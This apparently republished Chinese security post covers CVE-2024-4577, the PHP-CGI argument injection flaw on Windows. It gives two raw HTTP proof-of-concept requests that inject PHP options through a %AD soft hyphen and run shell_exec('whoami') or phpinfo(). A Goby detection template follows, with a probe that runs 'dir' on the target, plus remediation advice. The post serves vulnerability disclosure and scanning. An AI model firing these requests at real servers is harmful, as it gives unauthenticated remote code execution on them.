漏洞参数:*
漏洞详情:
1、启动自己搭建的测试服务
2、使用以下poc进行验证
php代码:<?php echo shell_exec('whoami');?>
POC1:
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: {{host}} User-Agent: curl/8.3.0 Accept: */* Content-Length: 23 Content-Type: application/x-www-form-urlencoded Connection: keep-alive <?php phpinfo(); ?>
POC2:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1 Host: {{host}} Content-Length: 34 Content-Type: text/html; charset=UTF-8 Content-Type: application/x-www-form-urlencoded Redirect-Status: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 <?php echo shell_exec('whoami');?>
Goby 检测脚本(仅包含扫描步骤,HasExp 为 false):
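package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
)

// init registers the Goby detection definition for the PHP-CGI argument
// injection on Windows (CVE-2024-4577) with ExpManager.
//
// The definition is a JSON document held in expJson:
//
//   - FofaQuery / GobyQuery select hosts whose body contains
//     "XAMPP for Windows".
//   - ScanSteps starts with "OR" and holds two probes (presumably either one
//     matching marks the host as affected; confirm against the Goby docs):
//     1. POST to /php-cgi/php-cgi.exe with the %AD-prefixed options in the
//     query string; the body runs `dir` through shell_exec and the check
//     expects HTTP 200 with "<DIR>" in the response. This probe runs an
//     OS command on the scanned host.
//     2. POST to /test.php with the same query string; the body calls
//     phpinfo() and the check expects HTTP 200 with "phpinfo" in the
//     response.
//   - ExploitSteps only issues GET /test.php and looks for "test"; HasExp is
//     false, so this looks like an unused template placeholder.
//
// NOTE(review): the second probe matches on the literal "phpinfo", which is
// also part of the request body. A server that reflects the request body
// (error page, debug echo) could satisfy the check without being vulnerable;
// matching on text that only rendered phpinfo() output contains would reduce
// false positives.
//
// The metadata fields (Description, Impact, Recommendation, CVEIDs,
// References, VulType, Tags and the translations) are filled in so that a
// finding carries the CVE identifier and remediation guidance into the scan
// report. The request and response-test sections are unchanged.
func init() {
	expJson := `{
  "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
  "Description": "When PHP runs in CGI mode on Windows, the operating system's Best-Fit character conversion can turn certain characters in the query string (for example the soft hyphen, 0xAD) into a hyphen on some code pages. This bypasses the existing protection against argument injection and lets a remote client pass command-line options to php-cgi.",
  "Product": "PHP",
  "Homepage": "",
  "DisclosureDate": "2024-06-08",
  "PostTime": "2024-06-08",
  "Author": "[email protected]",
  "FofaQuery": "body=\"XAMPP for Windows\"",
  "GobyQuery": "body=\"XAMPP for Windows\"",
  "Level": "3",
  "Impact": "An unauthenticated remote attacker can execute arbitrary PHP code on the server with the privileges of the web server process.",
  "Recommendation": "1. Upgrade PHP to an official release that contains the fix for CVE-2024-4577. 2. Until the upgrade is done, do not expose php-cgi.exe directly (for example the default /php-cgi/ mapping in XAMPP) and run PHP through FastCGI, PHP-FPM or mod_php instead of CGI mode. 3. Block requests whose query string contains %AD at the web server or WAF, and review access logs for query strings containing %ADd, allow_url_include or auto_prepend_file.",
  "References": [
    "https://nvd.nist.gov/vuln/detail/CVE-2024-4577"
  ],
  "Is0day": false,
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "OR",
    {
      "Request": {
        "method": "POST",
        "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {
          "REDIRECT-STATUS": "1",
          "Content-type": "text/html; charset=UTF-8",
          "Content-Type": "application/x-www-form-urlencoded",
          "Content-Length": "21"
        },
        "data_type": "text",
        "data": "<?php echo shell_exec('dir');?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "<DIR>",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": "<?php\nphpinfo();\n?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "phpinfo",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [
    "Code Execution"
  ],
  "VulType": [
    "Code Execution"
  ],
  "CVEIDs": [
    "CVE-2024-4577"
  ],
  "CNNVD": [
    ""
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "",
  "Translation": {
    "CN": {
      "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
      "Product": "PHP",
      "Description": "在 Windows 上以 CGI 模式运行的 PHP 在处理查询字符串时,受系统 Best-Fit 字符转换影响,特定字符(如 0xAD)在部分代码页下会被转换为连字符,从而绕过已有的参数注入防护,使远程客户端可以向 php-cgi 传入命令行选项。",
      "Recommendation": "1. 将 PHP 升级到已修复 CVE-2024-4577 的官方版本;2. 升级完成前,避免直接暴露 php-cgi.exe(例如 XAMPP 默认的 /php-cgi/ 映射),改用 FastCGI、PHP-FPM 或 mod_php 运行 PHP;3. 在 Web 服务器或 WAF 上拦截查询字符串中包含 %AD 的请求,并在访问日志中排查含有 %ADd、allow_url_include、auto_prepend_file 的请求。",
      "Impact": "未经身份验证的远程攻击者可以 Web 服务进程的权限在服务器上执行任意 PHP 代码。",
      "VulType": [
        "代码执行"
      ],
      "Tags": [
        "代码执行"
      ]
    },
    "EN": {
      "Name": "PHP CGI Argument Injection Remote Code Execution on Windows (CVE-2024-4577)",
      "Product": "PHP",
      "Description": "When PHP runs in CGI mode on Windows, the operating system's Best-Fit character conversion can turn certain characters in the query string (for example the soft hyphen, 0xAD) into a hyphen on some code pages. This bypasses the existing protection against argument injection and lets a remote client pass command-line options to php-cgi.",
      "Recommendation": "1. Upgrade PHP to an official release that contains the fix for CVE-2024-4577. 2. Until the upgrade is done, do not expose php-cgi.exe directly (for example the default /php-cgi/ mapping in XAMPP) and run PHP through FastCGI, PHP-FPM or mod_php instead of CGI mode. 3. Block requests whose query string contains %AD at the web server or WAF, and review access logs for query strings containing %ADd, allow_url_include or auto_prepend_file.",
      "Impact": "An unauthenticated remote attacker can execute arbitrary PHP code on the server with the privileges of the web server process.",
      "VulType": [
        "Code Execution"
      ],
      "Tags": [
        "Code Execution"
      ]
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "PocGlobalParams": {},
  "ExpGlobalParams": {}
}`

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}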
原文始发于微信公众号(小羊安全屋):【代码执行】PHP-CGI(CVE-2024-4577)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。